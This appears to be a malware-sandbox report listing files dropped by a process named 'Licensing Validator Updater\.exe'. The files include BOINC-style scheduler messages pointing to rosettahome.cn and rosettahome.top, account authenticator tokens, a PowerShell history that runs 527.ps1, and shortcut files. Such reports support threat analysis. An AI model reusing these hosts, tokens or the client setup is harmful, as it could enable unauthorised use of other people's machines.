                                                                                                                                                                                                                                                                                                                                                      SHA-512:85A95525CFF651C2A192123EAE938DB836602903F348A491AC66142B85E4D505F6F67BF7D1512E9F7218DF9B6828584E4128B17496250A42AE6FC91AD38B90FD
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>. <html lang="en">. <head>. . <meta name="viewport" content="width=device-width, initial-scale=1">. . <scheduler>http://rosettahome.top/rosettahome_cgi/cgi</scheduler> -->.<link rel="boinc_scheduler" href="http://rosettahome.top/rosettahome_cgi/cgi">. <title>REPLACE WITH PROJECT NAME</title>.. <meta charset="utf-8">. . <link type="text/css" rel="stylesheet" href="http://rosettahome.cn/rosettahome//bootstrap.min.css" media="all">. . <link rel=alternate type="application/rss+xml" title="RSS 2.0" href="http://rosettahome.cn/rosettahome/rss_main.php">. </head>. <body >. SVN VERSIONS -->. $Id$ -->. $Id: pm.inc 14019 2007-11-01 23:04:39Z davea $ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->. $Id$ -->.<div class="container-fluid">. <img class="img-responsive" style="width:100%" src="img/water.jpg"><nav class="navbar navbar-default">..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):23
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.567040216926579
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:BhMGC:8B
                                                                                                                                                                                                                                                                                                                                                      MD5:6B0A8CC3F90BFEA8C69440F259D95BA4
                                                                                                                                                                                                                                                                                                                                                      SHA1:99EE4A003CA2C5499E90CB6A64BC3960850AA7AF
                                                                                                                                                                                                                                                                                                                                                      SHA-256:269B3AD12D598980B0EB1673443E84FAC6D7F2B66639B2B72F284DDFB38FD7D9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:3138782F8ECBDE11BB70FB2825656432862EA62DCA20CEDF25947DD26122E92A40F9CDD09D717827F7BD98BA3E210E30F4F23C332BEFD82133999E845CC865EF
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<notices>..</notices>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):267
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.950202445827279
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:RANF/u1i8LJsE9rkdd9QAnASep5dHpOksaWwRwu:+F/u1iNdq0NeXdsrwRv
                                                                                                                                                                                                                                                                                                                                                      MD5:59E58FBBFEA295E359C0B3DDCE4E5E6D
                                                                                                                                                                                                                                                                                                                                                      SHA1:8D1528A293A61E19D536624A3D24216F4696AC97
                                                                                                                                                                                                                                                                                                                                                      SHA-256:A59DBB66285D0A209D78858BDA62C0824CA4E88AE69DBDE5202D033DAB5A2209
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5C912089D417A8352358EF6586A4352BACE4181433B087A3E0ECC33ED824E1C95934AE94D646768890FEB27F0874E209F4EF7A7BF7F168CDD6EE10D1D4E2D788
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<rss_feeds>.. <rss_feed>.. <url>http://rosettahome.cn/rosettahome/notices.php?userid=1&amp;auth=1_1a362b2ad50985e203845fe44682096e</url>.. <poll_interval>86400.000000</poll_interval>.. <next_poll_time>0.000000</next_poll_time>.. </rss_feed>..</rss_feeds>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):359
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.804733975144003
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:TMVBdIpQFqVX+vHMQc4I4YhFtLqi8LfzMelGDUigxhN6q9Q54mhNZrvHGd:TMHdIWE4I4mKi2cD2vTWf+d
                                                                                                                                                                                                                                                                                                                                                      MD5:C8388AC433DE11D6B3F0F83A39177A3A
                                                                                                                                                                                                                                                                                                                                                      SHA1:EE464ACF637E28D908BEE66E6E3636C5E9E90593
                                                                                                                                                                                                                                                                                                                                                      SHA-256:442090429C699DA291940D7230EA46DA588F860EB015B491BE24CA3D3D777EDE
                                                                                                                                                                                                                                                                                                                                                      SHA-512:036728476536D80D7B0D4BA71BC9AFF27047BF8B0801F407AF8D52008BFDC172718F3762FD0E0DFEFC7BFB5EF8CEB436E554319F10736663057296E553555A1C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="ISO-8859-1" ?>. <rss version="2.0">. <channel>. <title>REPLACE WITH PROJECT NAME notices</title>. <link>http://rosettahome.cn/rosettahome/</link>. <description>Notices</description>. <lastBuildDate>Tue, 14 Jan 2025 19:46:43 GMT</lastBuildDate>. . </channel>. </rss>.
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1816
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.890120869422368
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<scheduler_reply>.<scheduler_version>801</scheduler_version>.<dont_use_dcf/>.<master_url>http://rosettahome.cn/rosettahome/</master_url>.<request_delay>2.000000</request_delay>.<message priority="low">Project has no tasks available</message>.<project_name>rosettahome</project_name>.<next_rpc_delay>300.000000</next_rpc_delay>.<userid>1</userid>.<user_name>rosettatest</user_name>.<user_total_credit>0.000000</user_total_credit>.<user_expavg_credit>0.000000</user_expavg_credit>.<user_create_time>1718459909</user_create_time>.<email_hash>edd98bc9b7df6fce0618815ed033a68a</email_hash>.<cross_project_id>27d0816fe7754f6d58533d96ebd9b395</cross_project_id>.<external_cpid>f32080c087a0f17200379c858e8b43a3</external_cpid>..<host_total_credit>0.000000</host_total_credit>.<host_expavg_credit>0.000000</host_expavg_credit>.<host_venue></host_venue>.<host_create_time>1736884001</host_create_time>.<team_name></team_name>.<gui_urls>. <gui_url>. <name>Message boards</name>. <description>Co
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2399
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.887939208206757
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<scheduler_reply>.<scheduler_version>801</scheduler_version>.<dont_use_dcf/>.<master_url>http://rosettahome.cn/rosettahome/</master_url>.<request_delay>2.000000</request_delay>.<message priority="low">Project has no tasks available</message>.<project_name>rosettahome</project_name>.<next_rpc_delay>300.000000</next_rpc_delay>.<userid>1</userid>.<user_name>rosettatest</user_name>.<user_total_credit>0.000000</user_total_credit>.<user_expavg_credit>0.000000</user_expavg_credit>.<user_create_time>1718459909</user_create_time>.<email_hash>edd98bc9b7df6fce0618815ed033a68a</email_hash>.<cross_project_id>27d0816fe7754f6d58533d96ebd9b395</cross_project_id>.<external_cpid>f32080c087a0f17200379c858e8b43a3</external_cpid>..<hostid>17205</hostid>.<host_total_credit>0.000000</host_total_credit>.<host_expavg_credit>0.000000</host_expavg_credit>.<host_venue></host_venue>.<host_create_time>1736884001</host_create_time>.<team_name></team_name>.<code_sign_key>.1024.b7c89af6ddecc40111fd8a612dba39d8d17b6008
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399)
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6530
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.949084413956154
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<scheduler_request>. <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>. <hostid>17205</hostid>. <rpc_seqno>0</rpc_seqno>. <core_client_major_version>8</core_client_major_version>. <core_client_minor_version>0</core_client_minor_version>. <core_client_release>2</core_client_release>. <resource_share_fraction>1.000000</resource_share_fraction>. <rrs_fraction>1.000000</rrs_fraction>. <prrs_fraction>1.000000</prrs_fraction>. <duration_correction_factor>1.000000</duration_correction_factor>. <allow_multiple_clients>0</allow_multiple_clients>. <sandbox>0</sandbox>. <dont_send_work>0</dont_send_work>. <work_req_seconds>207360.000000</work_req_seconds>. <cpu_req_secs>207360.000000</cpu_req_secs>. <cpu_req_instances>4.000000</cpu_req_instances>. <estimated_delay>0.000000</estimated_delay>. <client_cap_plan_class>1</client_cap_plan_class>. <platform_name>windows_x86_64</platform_name>. <alt_platform>. <name>window
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399)
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5860
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.927180403575281
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<scheduler_request>. <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>. <hostid>0</hostid>. <rpc_seqno>0</rpc_seqno>. <core_client_major_version>8</core_client_major_version>. <core_client_minor_version>0</core_client_minor_version>. <core_client_release>2</core_client_release>. <resource_share_fraction>1.000000</resource_share_fraction>. <rrs_fraction>1.000000</rrs_fraction>. <prrs_fraction>1.000000</prrs_fraction>. <duration_correction_factor>1.000000</duration_correction_factor>. <allow_multiple_clients>0</allow_multiple_clients>. <sandbox>0</sandbox>. <dont_send_work>0</dont_send_work>. <work_req_seconds>1.000000</work_req_seconds>. <cpu_req_secs>1.000000</cpu_req_secs>. <cpu_req_instances>0.000000</cpu_req_instances>. <estimated_delay>0.000000</estimated_delay>. <client_cap_plan_class>1</client_cap_plan_class>. <platform_name>windows_x86_64</platform_name>. <alt_platform>. <name>windows_intelx86</na
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.530741820498357
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<project_statistics>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <daily_statistics>.. <day>1736812800.000000</day>.. <user_total_credit>0.000000</user_total_credit>.. <user_expavg_credit>0.000000</user_expavg_credit>.. <host_total_credit>0.000000</host_total_credit>.. <host_expavg_credit>0.000000</host_expavg_credit>.. </daily_statistics>..</project_statistics>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.530741820498357
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<project_statistics>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <daily_statistics>.. <day>1736812800.000000</day>.. <user_total_credit>0.000000</user_total_credit>.. <user_expavg_credit>0.000000</user_expavg_credit>.. <host_total_credit>0.000000</host_total_credit>.. <host_expavg_credit>0.000000</host_expavg_credit>.. </daily_statistics>..</project_statistics>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):73
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4110213048329925
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:gFkdNzK5J4HlLezGQv:GkryaFLen
                                                                                                                                                                                                                                                                                                                                                      MD5:16D1F3B711B8570ABF4B8293FBE59F3F
                                                                                                                                                                                                                                                                                                                                                      SHA1:5C15DF37B0C82E9EDBF13F04BEDC8AA823AD9CB5
                                                                                                                                                                                                                                                                                                                                                      SHA-256:641C5D05245023008E98680785010615F7C5BBDDFAF76D0A8CA9E75FE70C5F5B
                                                                                                                                                                                                                                                                                                                                                      SHA-512:F25AC7A837B0C74309420386B6C030F7A4E195E69E738501ACD034972672E67CF1167CCC276220ADF537BB49B20AE7BC0309AA69607E3FA9B0DED056E06BF86A
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:No NVIDIA library found..No ATI library found...No OpenCL library found..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):118
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.469520017712775
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:bpNy/ZyFFj+ALzVV/aFRqLXVgF/Z8WtdVVt4bKKPy0hdNyn:bmxy/j+APSFRqyR8Wtdl4Wcvyn
                                                                                                                                                                                                                                                                                                                                                      MD5:CB723FE22B7435EBEE570841E2E39F26
                                                                                                                                                                                                                                                                                                                                                      SHA1:BE8A67E0DACE13A6DE166A9D56FB14DEE7454A8E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:3638C84734824C148862D42CD2E2693614C664101DFD84DE90D6F49DC6824645
                                                                                                                                                                                                                                                                                                                                                      SHA-512:2EB64AC821CA4FC6AF97B9FE8BCC539EE1791A0F24E773F9D542EABED8C57BFF021AE88DF6ABDCA2727B2BE2F91ABE3167D76415F5924BBD50E79DDCE9313E5F
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<daily_xfers>..<dx>.. <when>20102</when>.. <up>0.000000</up>.. <down>6192.000000</down>..</dx>..</daily_xfers>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):938
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.596457271252631
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:c23hSZMAkRA/oAUjDbJv4jFW1YahjyOeJ:RxSpd/oA4vL1YaUd
                                                                                                                                                                                                                                                                                                                                                      MD5:2D2869CF40771468F523051ED737CB33
                                                                                                                                                                                                                                                                                                                                                      SHA1:2110C8A839EF0509FB3BEC0E8967C3281C86A17E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:191E62287F8136AEAED806639F7FFFCBA7404575C5AF12108582831200450AF9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:DCEE37CCB813D156210BC7053E5E57C06175C64A3706205F1F17B73E698400E2EE1FE7738EA6E638829F3AD3BF5A9F3731EA4AA3DE7AAB6B6EAE923D3E3F80B9
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<account>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>.. <project_name>rosettahome</project_name>..<project_preferences>..</project_preferences>..<gui_urls>.... <gui_url>.. <name>Message boards</name>.. <description>Correspond with other users on the rosettahome message boards</description>.. <url>http://rosettahome.cn/rosettahome/forum_index.php</url>.. </gui_url>.. <gui_url>.. <name>Your account</name>.. <description>View your account information</description>.. <url>http://rosettahome.cn/rosettahome/home.php</url>.. </gui_url>.. <gui_url>.. <name>Your tasks</name>.. <description>View the last week or so of computational work</description>.. <url>http://rosettahome.cn/rosettahome/results.php?userid=1</url>.. </gui_url>.. ..</gui_urls>..</account>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.530741820498357
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:YwRXfi2WfRXPcMfilQ9Ik6k/W059WOkJPk/JqR9twRn:Za2srmk6kO7OkJPkqGn
                                                                                                                                                                                                                                                                                                                                                      MD5:AC0402B70EAFE79B6127F93E4736362C
                                                                                                                                                                                                                                                                                                                                                      SHA1:6A9E0B33FD68BC41E4971A49553CB9C04DB0D2E5
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5DDFE28A7C9B27D32F6C55648D26C60F4BF61F9028249D4F9059075FAE169027
                                                                                                                                                                                                                                                                                                                                                      SHA-512:DC1F530D9C07FFAFD21338F2A9E9BA76FC8AF84F592B74CD925815994A55351AAC05E06FD91A8337ED3D84609C347AF102B8DBF7D164EBC2BADAE4FF11E1038C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<project_statistics>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <daily_statistics>.. <day>1736812800.000000</day>.. <user_total_credit>0.000000</user_total_credit>.. <user_expavg_credit>0.000000</user_expavg_credit>.. <host_total_credit>0.000000</host_total_credit>.. <host_expavg_credit>0.000000</host_expavg_credit>.. </daily_statistics>..</project_statistics>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.360664591483912
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:LvcRVdXEO6MlT59XcSI6GQ/:wRP6Y5iSHGQ/
                                                                                                                                                                                                                                                                                                                                                      MD5:014F956507C7ACBDB19B81A43EB366F9
                                                                                                                                                                                                                                                                                                                                                      SHA1:037A8B30F9CC0C4DC6ABE22A6012431F1A762744
                                                                                                                                                                                                                                                                                                                                                      SHA-256:827AE1CE33FC8B4D789ECB250AA4B5F345EAB81FF37AF6655634F6D58F9A617A
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EA68F018022D13E9B6F83ED0FBFBC07BAE83473E3F283C60162294BB86E057ABB0CABC43C513E2B7715265985F238CD107B7C349D2A053E2590B97D8EA81DDEF
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:1736883991.082867 power_on..1736884022.005878 net_connected..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):45
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.9111711733157262
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:/lwltjMl:W1k
                                                                                                                                                                                                                                                                                                                                                      MD5:C70557EF5BCA1A1D99325A077BF9B972
                                                                                                                                                                                                                                                                                                                                                      SHA1:7E056B60C432420F0CFB3327AFFD1364663AF7A8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:53EEA1594C610579360072DEADF876F0C8CC08D6503525391938D5536C7B6853
                                                                                                                                                                                                                                                                                                                                                      SHA-512:E5E27814EE868D2B8B1A9ACDE6516D7B6125D82CB64904E1D3FCE3E429849099B80F459B4C1735ABC292028CEDDE71341F61E00B783710302CB2D21D34436552
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:........................................user.
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.214481943140828
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:LjfemSv6qWAXvv4LsV5QCyBdhWxv:HqH4L05Q7bAxv
                                                                                                                                                                                                                                                                                                                                                      MD5:0889C72D62B6CB979A66532D3C005CB0
                                                                                                                                                                                                                                                                                                                                                      SHA1:DC75FF40A09946978BFE158CA517ED2B7689772F
                                                                                                                                                                                                                                                                                                                                                      SHA-256:D994AA37730B97DD64EB39E53ED29E6FDCD9827B69395304D852DBEEB39520FB
                                                                                                                                                                                                                                                                                                                                                      SHA-512:AB16659373A24D9FE43291C34B74765A24C7DCD15C6076AC2B2BE8393ACD1F8D371A0C12F0A967BA1F449B74DD2234FFF94DEC0B7166F1A9D9E2E64E472193BF
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:start cmd..cd ..\users..cd \..cd users..cd .\user\desktop\527..dir... .\527.ps1..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5440
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9297324647367264
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:uO518dpg8MwCVU272pukvjwortKGia7DSogZowNKGia7DSogZoJG1:P8nMwCaIrkvMCKGibHXKGibHk4
                                                                                                                                                                                                                                                                                                                                                      MD5:9265FB37DA923227C0E5C510774AF4AD
                                                                                                                                                                                                                                                                                                                                                      SHA1:884DB23CBF8FE88141284D9907CD695B1C326F6B
                                                                                                                                                                                                                                                                                                                                                      SHA-256:959F4AF3D0CBBE9AA0E85A2FA428D25436C05B155546FE2CDB292BDF27CE6E45
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D0DDE7E8D419B36093A5CDA7843BAEDF2471675660232B9C5E83A101674E93EF6502F2659A711A4053BF078F5AFE6430807EAC270C41F3A5AD6743189594EDC3
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:...................................FL..................F. .. ......{4....C'.f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4.......f..%.'.f......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H.Z................................A.p.p.D.a.t.a...B.V.1......Z....Roaming.@......FW.H.Z.............................:U.R.o.a.m.i.n.g.....\.1......Z....MICROS~1..D......FW.H.Z.............................\..M.i.c.r.o.s.o.f.t.....V.1.....GX3w..Windows.@......FW.H.Z..............................K.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H.Z......................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Z....Programs..j......FW.H.Z......................@......f..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H.Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H.Z......Q...........
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2673
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.982301821577703
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8/nmdjTMnjinHbidAKZdA1FehwiZUklqehNy+3:8/n6Silqy
                                                                                                                                                                                                                                                                                                                                                      MD5:9F2A1D1BABE5339C84259DA36D7E00A9
                                                                                                                                                                                                                                                                                                                                                      SHA1:A9A3DF77BD40DA29F0330E2A731F07E202F29C74
                                                                                                                                                                                                                                                                                                                                                      SHA-256:50CB40FBF89A772F5447CDD65F560FB3E788CDE7EEFC906143424CE73738DF58
                                                                                                                                                                                                                                                                                                                                                      SHA-512:9A9ED063DDFDFC37760E850D75DDE5814BA1F78F0E7453E0ED2446370FE66E036771F1FFF5DD7741E64E63C15CE4EDC6799EBB87341B5D716976F2FE49235D99
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....4L.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........>. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 18:45:10 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2675
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.000357319150815
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:82djTMnjinHbidAKZdA1seh/iZUkAQkqehay+2:8KSi79QDy
